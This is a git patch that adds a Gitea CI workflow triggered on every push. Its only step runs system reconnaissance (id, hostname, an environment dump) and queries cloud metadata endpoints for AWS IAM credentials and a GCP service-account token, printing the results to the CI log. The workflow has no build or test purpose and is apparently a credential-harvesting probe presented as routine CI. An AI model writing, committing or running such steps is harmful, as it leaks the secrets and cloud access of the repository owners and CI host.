From 9196500b566cc9e8f87f72fb5a7786f65d89b4a1 Mon Sep 17 00:00:00 2001 From: dev89370 Date: Wed, 15 Jul 2026 04:23:11 +0000 Subject: [PATCH] add workflow --- .gitea/workflows/ci.yml | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 .gitea/workflows/ci.yml diff --git a/.gitea/workflows/ci.yml b/.gitea/workflows/ci.yml new file mode 100644 index 0000000..ae41af0 --- /dev/null +++ b/.gitea/workflows/ci.yml @@ -0,0 +1,13 @@ +name: CI +on: [push] +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: | + id + hostname + env | head -20 + curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || echo NO_AWS + echo SEP + curl -s -H Metadata-Flavor:Google http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token 2>/dev/null || echo NO_GCP